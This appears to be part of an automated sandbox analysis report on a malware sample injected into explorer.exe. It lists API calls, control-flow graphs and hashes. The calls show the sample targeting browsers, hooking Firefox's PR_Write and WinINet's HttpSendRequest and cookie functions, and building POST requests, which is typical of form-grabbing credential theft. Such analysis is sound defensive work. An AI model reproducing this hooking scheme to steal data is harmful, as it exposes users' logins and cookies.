                                                      control_flow_graph 426 820a7-82102 call 82415 call 829b7 call 82938 call 824cc 435 8211d-82129 426->435 436 82104-8211b 426->436 439 8212d-8212f 435->439 436->439 440 82403-82412 call 82999 439->440 441 82135-8216c RtlZeroMemory 439->441 445 823fb-82402 441->445 446 82172-8218d 441->446 445->440 447 821bf-821d1 446->447 448 8218f-821a0 call 8243d 446->448 453 821d5-821d7 447->453 454 821a2-821b1 448->454 455 821b3 448->455 456 823e8-823ee 453->456 457 821dd-82239 call 82866 453->457 458 821b5-821bd 454->458 455->458 461 823f0-823f2 call 82999 456->461 462 823f7 456->462 466 8223f-82244 457->466 467 823e1 457->467 458->453 461->462 462->445 468 8225e-8228c call 829b7 wsprintfW 466->468 469 82246-82257 466->469 467->456 472 8228e-82290 468->472 473 822a5-822bc 468->473 469->468 474 82291-82294 472->474 479 822fb-82315 473->479 480 822be-822f4 call 829b7 wsprintfW 473->480 475 8229f-822a1 474->475 476 82296-8229b 474->476 475->473 476->474 478 8229d 476->478 478->473 484 8231b-8232e 479->484 485 823be-823d4 call 82999 479->485 480->479 484->485 488 82334-8234a call 829b7 484->488 493 823dd 485->493 494 823d6-823d8 call 82999 485->494 495 8234c-82357 488->495 493->467 494->493 497 82359-82366 call 8297c 495->497 498 8236b-82382 495->498 497->498 502 82384 498->502 503 82386-82393 498->503 502->503 503->495 504 82395-82399 503->504 505 8239b 504->505 506 823b3-823ba call 82999 504->506 508 8239b call 8296b 505->508 506->485 510 823a0-823ad RtlMoveMemory 508->510 510->506
                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • Part of subcall function 00082938: lstrlen.KERNEL32(0041AE26,?,00000000,00000000,000820E3,75712B62,0041AE26,00000000), ref: 00082940
                                                        • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0041AE26,00000001,00000000,00000000), ref: 00082952
                                                        • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                                      • wsprintfW.USER32 ref: 00082278
                                                      • wsprintfW.USER32 ref: 000822E3
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698
                                                      • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                      • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                                      • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                      • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52
                                                      Function 00081ECE Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 511 81ece-81eec StrStrIA 512 81eee-81ef0 511->512 513 81ef5-81f35 RtlMoveMemory * 2 StrStrIA 511->513 514 81fab-81fb3 512->514 515 81fa7 513->515 516 81f37-81f48 StrStrIA 513->516 517 81fa9-81faa 515->517 516->515 518 81f4a-81f5b StrStrIA 516->518 517->514 518->515 519 81f5d-81f68 lstrlen 518->519 520 81f6a 519->520 521 81fa3-81fa5 519->521 522 81f6c-81f78 call 81ffb 520->522 521->517 525 81f7a-81f80 522->525 526 81f9b-81fa1 lstrlen 522->526 527 81f82-81f85 525->527 528 81f87-81f8a 525->528 526->521 526->522 527->526 527->528 528->526 529 81f8c-81f8f 528->529 529->526 530 81f91-81f94 529->530 530->526 531 81f96-81f99 530->531 531->515 531->526
                                                      APIs
                                                      • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                                      • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                                      • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                                      • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                                      • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                                      • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                                      • lstrlen.KERNEL32(00000000), ref: 00081F64
                                                      • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMovelstrlen
                                                      • String ID:
                                                      • API String ID: 456560858-0
                                                      • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                      • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                                      • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                      • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                                      Function 00081E44 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                                      • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                                      • lstrcmpi.KERNEL32(00000000,0041C16C), ref: 00081E81
                                                      • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                                      • RtlMoveMemory.NTDLL(0041C16C,00000000,00000000), ref: 000826A2
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                      • String ID:
                                                      • API String ID: 2826435453-0
                                                      • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                      • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                                      • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                      • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                                      Function 000818F4 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081966
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                                        • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                                      • String ID:
                                                      • API String ID: 3402831612-0
                                                      • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                      • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                                      • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                      • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                                      Execution Graph

                                                      Execution Coverage:6.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:223
                                                      Total number of Limit Nodes:16
                                                      execution_graph 1575 82c18 1576 82c2a 1575->1576 1577 82bf2 11 API calls 1576->1577 1579 82c82 1576->1579 1578 82c45 1577->1578 1578->1579 1580 81141 2 API calls 1578->1580 1581 82c59 1580->1581 1582 82c79 1581->1582 1583 82c5d lstrlen 1581->1583 1586 8105d VirtualFree 1582->1586 1584 82678 6 API calls 1583->1584 1584->1582 1586->1579 1332 83449 RtlEnterCriticalSection 1333 8346e 1332->1333 1334 834ce 1332->1334 1333->1334 1335 835bc RtlLeaveCriticalSection 1333->1335 1365 81274 VirtualQuery 1333->1365 1334->1335 1336 81274 VirtualQuery 1334->1336 1337 834e9 1336->1337 1337->1335 1340 834fd RtlZeroMemory 1337->1340 1364 835b1 1337->1364 1406 82f3d 1340->1406 1342 81274 VirtualQuery 1344 83494 1342->1344 1344->1334 1346 83498 lstrcat 1344->1346 1345 83526 StrToIntA 1345->1335 1347 8353b 1345->1347 1367 82faa 1346->1367 1418 81141 lstrlen lstrlen 1347->1418 1354 83558 1357 83574 1354->1357 1420 8105d VirtualFree 1354->1420 1355 83595 1358 82faa 16 API calls 1355->1358 1421 8104c VirtualAlloc 1357->1421 1361 835aa 1358->1361 1363 82f1f 22 API calls 1361->1363 1362 83585 RtlMoveMemory 1362->1335 1363->1364 1364->1335 1366 8128b 1365->1366 1366->1334 1366->1342 1368 81141 2 API calls 1367->1368 1369 82fbf 1368->1369 1370 82fd1 1369->1370 1371 81141 2 API calls 1369->1371 1374 83129 1370->1374 1422 81000 GetProcessHeap RtlAllocateHeap 1370->1422 1371->1370 1373 82fe6 1423 81000 GetProcessHeap RtlAllocateHeap 1373->1423 1402 82f1f 1374->1402 1376 82ff1 RtlZeroMemory 1377 82f3d 3 API calls 1376->1377 1378 83013 1377->1378 1379 83118 1378->1379 1380 8301e StrToIntA 1378->1380 1382 81011 3 API calls 1379->1382 1380->1379 1381 83038 1380->1381 1383 82f3d 3 API calls 1381->1383 1384 83120 1382->1384 1385 83047 1383->1385 1386 81011 3 API calls 1384->1386 1385->1379 1387 83051 lstrlen 1385->1387 1386->1374 1388 82f3d 3 API calls 1387->1388 1389 83066 1388->1389 1390 81141 2 API calls 1389->1390 1391 83074 1390->1391 1391->1379 1424 81000 GetProcessHeap RtlAllocateHeap 1391->1424 1393 8308b 1394 82f3d 3 API calls 1393->1394 1395 830a4 wsprintfA 1394->1395 1425 81000 GetProcessHeap RtlAllocateHeap 1395->1425 1397 830cc 1398 82f3d 3 API calls 1397->1398 1399 830dd lstrcat 1398->1399 1426 81011 1399->1426 1401 830ee lstrcat lstrlen RtlMoveMemory 1401->1379 1403 82f3c 1402->1403 1404 82f23 CreateThread CloseHandle 1402->1404 1405 8105d VirtualFree 1403->1405 1404->1403 1431 82ed2 1404->1431 1405->1334 1407 82f4b 1406->1407 1408 82f61 1406->1408 1409 81141 2 API calls 1407->1409 1410 81141 2 API calls 1408->1410 1415 82f57 1409->1415 1411 82f66 1410->1411 1412 82fa4 1411->1412 1413 81141 2 API calls 1411->1413 1412->1335 1412->1345 1413->1415 1414 81141 2 API calls 1416 82f8e 1414->1416 1415->1412 1415->1414 1416->1412 1417 82f92 RtlMoveMemory 1416->1417 1417->1412 1419 81162 1418->1419 1419->1335 1419->1354 1419->1355 1420->1357 1421->1362 1422->1373 1423->1376 1424->1393 1425->1397 1427 81274 VirtualQuery 1426->1427 1428 81019 1427->1428 1429 8102d 1428->1429 1430 8101d GetProcessHeap HeapFree 1428->1430 1429->1401 1430->1429 1432 82edd 1431->1432 1433 82f16 RtlExitUserThread 1431->1433 1443 8178c lstrlen 1432->1443 1436 82f0e 1438 81011 3 API calls 1436->1438 1438->1433 1441 82f07 1442 81011 3 API calls 1441->1442 1442->1436 1444 817d3 1443->1444 1445 817a4 CryptBinaryToStringA 1443->1445 1444->1436 1449 81b1b 1444->1449 1445->1444 1446 817b7 1445->1446 1461 81000 GetProcessHeap RtlAllocateHeap 1446->1461 1448 817c2 CryptBinaryToStringA 1448->1444 1450 81b3e 1449->1450 1451 81b31 lstrlen 1449->1451 1462 81000 GetProcessHeap RtlAllocateHeap 1450->1462 1451->1450 1453 81b46 lstrcat 1454 81b7b lstrcat 1453->1454 1455 81b82 1453->1455 1454->1455 1463 8186c 1455->1463 1458 81011 3 API calls 1459 81ba5 1458->1459 1460 8105d VirtualFree 1459->1460 1460->1441 1461->1448 1462->1453 1486 81000 GetProcessHeap RtlAllocateHeap 1463->1486 1465 81890 1487 8106c lstrlen MultiByteToWideChar 1465->1487 1467 8189f 1488 817dc RtlZeroMemory 1467->1488 1470 818f1 RtlZeroMemory 1473 81926 1470->1473 1471 81011 3 API calls 1472 81b10 1471->1472 1472->1458 1474 81af3 1473->1474 1490 81000 GetProcessHeap RtlAllocateHeap 1473->1490 1474->1471 1476 819e2 wsprintfW 1477 81a02 1476->1477 1485 81add 1477->1485 1491 81000 GetProcessHeap RtlAllocateHeap 1477->1491 1478 81011 3 API calls 1478->1474 1480 81a70 1481 81ad6 1480->1481 1492 8104c VirtualAlloc 1480->1492 1483 81011 3 API calls 1481->1483 1483->1485 1484 81ac6 RtlMoveMemory 1484->1481 1485->1478 1486->1465 1487->1467 1489 817fe 1488->1489 1489->1470 1489->1474 1490->1476 1491->1480 1492->1484 1493 82c8a 1501 82bf2 1493->1501 1495 82c9b 1496 82ca1 lstrlen 1495->1496 1497 82cc6 1495->1497 1506 82678 1496->1506 1521 8224c 1501->1521 1505 82c09 1505->1495 1507 82721 1506->1507 1508 82691 1506->1508 1520 8105d VirtualFree 1507->1520 1508->1507 1509 81274 VirtualQuery 1508->1509 1510 826a7 1509->1510 1510->1507 1511 82753 1510->1511 1513 8279e 1510->1513 1515 826e9 1510->1515 1534 81000 GetProcessHeap RtlAllocateHeap 1511->1534 1516 827ad 1513->1516 1535 81000 GetProcessHeap RtlAllocateHeap 1513->1535 1514 82768 memcpy 1514->1507 1519 82700 memcpy 1515->1519 1518 827c7 memcpy 1516->1518 1518->1507 1519->1507 1520->1497 1532 81000 GetProcessHeap RtlAllocateHeap 1521->1532 1523 82254 1524 823e3 1523->1524 1533 8104c VirtualAlloc 1524->1533 1526 82633 1526->1505 1527 825b5 lstrcat lstrcat lstrcat lstrcat 1528 823fc 1527->1528 1528->1526 1528->1527 1529 81011 GetProcessHeap HeapFree VirtualQuery 1528->1529 1530 82346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1528->1530 1531 8231f GetProcessHeap RtlAllocateHeap memcpy 1528->1531 1529->1528 1530->1528 1531->1528 1532->1523 1533->1528 1534->1514 1535->1518 1536 82cce 1537 82cd7 1536->1537 1538 82d02 1537->1538 1539 82678 6 API calls 1537->1539 1539->1538 1540 83401 1541 8340a 1540->1541 1542 83442 1540->1542 1543 81274 VirtualQuery 1541->1543 1544 83412 1543->1544 1544->1542 1545 83416 RtlEnterCriticalSection 1544->1545 1550 83132 1545->1550 1548 82f1f 22 API calls 1549 8343a RtlLeaveCriticalSection 1548->1549 1549->1542 1551 8314d 1550->1551 1564 832e8 1550->1564 1551->1564 1571 81000 GetProcessHeap RtlAllocateHeap 1551->1571 1553 831cd 1572 81000 GetProcessHeap RtlAllocateHeap 1553->1572 1555 83212 1556 832d8 1555->1556 1557 8322c lstrlen 1555->1557 1558 81011 3 API calls 1556->1558 1557->1556 1559 8323d 1557->1559 1560 832df 1558->1560 1561 81141 2 API calls 1559->1561 1562 81011 3 API calls 1560->1562 1563 8324b 1561->1563 1562->1564 1563->1556 1573 81000 GetProcessHeap RtlAllocateHeap 1563->1573 1564->1548 1566 83260 1574 81000 GetProcessHeap RtlAllocateHeap 1566->1574 1568 8327f wsprintfA lstrcat 1569 81011 3 API calls 1568->1569 1570 832b8 lstrcat lstrlen RtlMoveMemory 1569->1570 1570->1556 1571->1553 1572->1555 1573->1566 1574->1568 1597 83371 1598 8337a 1597->1598 1599 833b2 1597->1599 1600 81274 VirtualQuery 1598->1600 1601 83382 1600->1601 1601->1599 1602 83386 RtlEnterCriticalSection 1601->1602 1603 83132 13 API calls 1602->1603 1604 833a3 1603->1604 1605 82f1f 22 API calls 1604->1605 1606 833aa RtlLeaveCriticalSection 1605->1606 1606->1599 1607 832f4 1608 83302 1607->1608 1609 8335f 1608->1609 1610 8332b RtlEnterCriticalSection 1608->1610 1611 8334e 1610->1611 1612 83342 1610->1612 1614 83357 RtlLeaveCriticalSection 1611->1614 1613 82faa 16 API calls 1612->1613 1615 83347 1613->1615 1614->1609 1616 82f1f 22 API calls 1615->1616 1616->1611

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00081C08 25 Function_0008104C 0->25 58 Function_00081C82 0->58 72 Function_00081BAF 0->72 86 Function_00081BD2 0->86 1 Function_00083709 2 Function_00081000 1->2 11 Function_00081011 1->11 45 Function_00081363 1->45 78 Function_000815BE 1->78 3 Function_00083401 9 Function_00082F1F 3->9 18 Function_00083132 3->18 51 Function_00081274 3->51 4 Function_00088702 5 Function_00081305 6 Function_00082C18 30 Function_00081141 6->30 35 Function_0008105D 6->35 48 Function_00082678 6->48 99 Function_00082BF2 6->99 7 Function_00081B1B 7->2 7->11 40 Function_0008186C 7->40 8 Function_00082E1B 8->2 8->11 85 Function_00082ED2 9->85 10 Function_0008231F 10->2 11->51 12 Function_00089814 13 Function_00083829 13->1 74 Function_000836A1 13->74 87 Function_000835D4 13->87 14 Function_00081320 15 Function_00089321 16 Function_00082F3D 16->30 17 Function_0008133F 18->2 18->11 18->30 19 Function_00081235 20 Function_00085137 21 Function_00088A37 22 Function_00089337 23 Function_00083449 23->9 23->16 23->25 23->30 23->35 23->51 70 Function_00082FAA 23->70 24 Function_0008104A 26 Function_00081E4C 27 Function_0008224C 27->2 28 Function_00081F4E 29 Function_00083840 31 Function_00082643 32 Function_00089844 33 Function_00082346 33->2 33->11 66 Function_00082296 33->66 34 Function_00082659 36 Function_0008285F 36->30 37 Function_00089955 38 Function_0008966A 39 Function_0008106C 40->2 40->11 40->25 40->39 63 Function_00081090 40->63 84 Function_000817DC 40->84 41 Function_0008926D 42 Function_00082B6E 42->7 42->11 42->35 42->42 52 Function_00082974 42->52 54 Function_0008178C 42->54 96 Function_000827E7 42->96 43 Function_00081261 44 Function_00083862 44->0 44->2 44->5 44->11 44->13 44->14 44->19 44->30 44->43 44->51 56 Function_0008118D 44->56 60 Function_00082D9A 44->60 44->63 67 Function_00082EA8 44->67 69 Function_000812AA 44->69 82 Function_000816C7 44->82 94 Function_00081FE5 44->94 45->17 46 Function_00089763 47 Function_00081765 48->2 48->51 49 Function_00083371 49->9 49->18 49->51 50 Function_00088A71 52->2 52->11 52->25 52->30 52->35 52->36 52->47 71 Function_000828AD 52->71 53 Function_00082C8A 53->35 53->48 53->99 54->2 55 Function_00083D8D 55->2 55->44 55->51 55->55 91 Function_00083BE1 55->91 57 Function_00088B81 93 Function_00081CE5 58->93 59 Function_00085198 61 Function_0008929C 62 Function_00088A9F 64 Function_00088F93 65 Function_00082295 67->8 68 Function_000815A9 70->2 70->11 70->16 70->30 71->30 73 Function_000850A0 74->2 74->11 74->45 83 Function_000814D8 74->83 75 Function_000823A2 76 Function_00081CA5 76->93 77 Function_000833B9 77->9 77->18 77->51 78->2 78->11 78->68 78->78 79 Function_00082CCE 79->48 80 Function_000887CE 81 Function_00088CC3 83->2 83->11 89 Function_000813D7 83->89 98 Function_000813FE 83->98 85->7 85->11 85->35 85->54 86->76 87->2 87->11 87->45 87->83 88 Function_000893D4 90 Function_00088EEF 91->2 91->5 91->13 91->14 91->19 91->30 91->43 91->51 91->63 91->67 91->69 91->94 92 Function_000823E3 92->10 92->11 92->25 92->33 92->75 94->26 94->28 94->51 95 Function_000895E5 96->11 96->51 97 Function_000889F9 98->2 98->11 98->83 98->89 99->27 99->92 100 Function_000832F4 100->9 100->70

                                                      Executed Functions

                                                      Function 00083862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334libraryloaderstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 83862-838de call 81000 GetModuleFileNameA call 81000 GetCurrentProcessId wsprintfA call 8118d CreateMutexA GetLastError 7 838e4-83940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 81000 Sleep lstrcmpi 0->7 8 83bc5-83c3a call 81011 * 2 RtlExitUserThread call 81000 * 2 wsprintfA call 81235 0->8 14 83a0a-83a14 lstrcmpi 7->14 15 83946-83961 GetCommandLineW CommandLineToArgvW 7->15 69 83c3c-83c4c call 81141 8->69 70 83c5e 8->70 17 83a1a-83a24 lstrcmpi 14->17 18 83b14-83b39 call 816c7 GetModuleHandleA GetProcAddress 14->18 19 83bc3-83bc4 15->19 20 83967-8398b call 816c7 GetModuleHandleA GetProcAddress 15->20 17->18 24 83a2a-83a40 lstrcmpi 17->24 34 83b3b-83b47 call 81c08 18->34 35 83b4c-83b59 GetModuleHandleA GetProcAddress 18->35 19->8 32 8398d-83999 call 81c08 20->32 33 8399e-839c0 GetModuleHandleA GetProcAddress 20->33 28 83a42-83a4e GetCommandLineA StrStrIA 24->28 29 83a67-83a71 lstrcmpi 24->29 28->29 37 83a50 28->37 30 83a88-83a92 lstrcmpi 29->30 31 83a73-83a7f GetCommandLineA StrStrIA 29->31 30->19 39 83a98-83aa4 GetCommandLineA StrStrIA 30->39 31->30 38 83a81-83a86 31->38 32->33 41 839c2-839d0 GetModuleHandleA GetProcAddress 33->41 42 839d6-839e8 GetModuleHandleA GetProcAddress 33->42 34->35 44 83b5b-83b67 call 81c08 35->44 45 83b6c-83b79 GetModuleHandleA GetProcAddress 35->45 47 83a55-83a65 GetModuleHandleA 37->47 38->47 39->19 48 83aaa-83ac5 GetModuleHandleA 39->48 41->42 49 83b08-83b0f call 816c7 41->49 50 839f9-83a05 42->50 51 839ea-839f3 GetModuleHandleA GetProcAddress 42->51 44->45 54 83b7b-83b87 call 81c08 45->54 55 83b8c-83bbe call 816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->55 56 83ace-83ad2 47->56 59 83ad8-83aea call 816c7 call 82d9a 48->59 60 83ac7-83acc GetModuleHandleA 48->60 49->19 61 83b03 call 81c08 50->61 51->49 51->50 54->55 55->19 56->19 56->59 59->49 82 83aec-83af5 call 81274 59->82 60->56 61->49 79 83c4e call 83829 69->79 80 83c53-83c59 call 81261 69->80 73 83c64-83c74 CreateToolhelp32Snapshot 70->73 76 83c7a-83c8e Process32First 73->76 77 83d7d-83d88 Sleep 73->77 81 83d6e-83d70 76->81 77->73 79->80 80->70 85 83c93-83ca5 lstrcmpi 81->85 86 83d76-83d77 CloseHandle 81->86 82->49 93 83af7-83b01 82->93 88 83cda-83ce3 call 812aa 85->88 89 83ca7-83cb5 lstrcmpi 85->89 86->77 97 83d62-83d68 Process32Next 88->97 98 83ce5-83cee call 81305 88->98 89->88 92 83cb7-83cc5 lstrcmpi 89->92 92->88 95 83cc7-83cd4 call 82ea8 92->95 93->61 95->88 95->97 97->81 98->97 102 83cf0-83cf7 call 81320 98->102 102->97 105 83cf9-83d06 call 81274 102->105 105->97 108 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 105->108 108->97
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                                      • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                                      • wsprintfA.USER32 ref: 000838B6
                                                        • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                        • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                        • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                        • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                        • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                        • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
                                                        • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                        • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                                      • GetLastError.KERNEL32 ref: 000838D3
                                                      • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                                      • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                                      • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                                      • Sleep.KERNEL32(000001F4), ref: 0008392A
                                                      • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                                      • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                                      • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                                      • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                                      • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                                      • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                                        • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                        • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                        • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                        • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                        • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                                      • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                                      • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                                      • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                                      • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
